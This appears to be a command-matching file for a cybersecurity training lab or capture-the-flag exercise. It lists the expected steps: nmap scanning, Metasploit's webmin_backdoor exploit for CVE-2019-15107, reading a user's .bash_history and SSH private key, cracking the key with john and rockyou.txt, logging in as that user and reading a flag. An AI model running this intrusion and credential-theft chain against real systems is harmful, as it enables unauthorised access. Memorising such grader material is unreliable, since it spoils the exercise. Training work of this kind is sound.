*,nmap db_nmap|\d*\.\d*\.\d*\.\d*,*
*,cat searchsploit nmap|/etc/services services webmin -sV,*
*,msfconsole|,*
*,search|webmin CVE-2019-15107 2019-15107,*
*,use|/exploit/unix/webapp/webmin_backdoor exploit/unix/webapp/webmin_backdoor unix/webapp/webmin_backdoor webapp/webmin_backdoor webmin_backdoor,*
*,show|options,*
*,set|LPORT LHOST RPORT PORTS RHOSTS PAYLOAD TARGET TARGETURL SSL,*
*,check|exploit_used check rhost_set rport_set lhost_set,*
*,run exploit|,*
*,cat less more nano leafpad editor head tail|/root/WARNING-READ-ME.txt WARNING-READ-ME.txt,*
*,ls|-a /home/eve,*
*,cat less more leafpad nano editor head tail find|\.bash_history /home/eve/\.bash_history,*
*,cat less more leafpad nano editor head tail find|/home/eve/\.ssh/id_rsa \.ssh/id_rsa id_rsa,*
*,python|ssh2john\.py,*
*,john|--wordlist /usr/share/wordlists/rockyou.txt,*
*,chmod|600 400 0600 0400,*
*,ssh|-i eve\@\d*\.\d*\.\d*\.\d*,*
*,cat less more head tail|flag.txt top-secret/flag.txt,*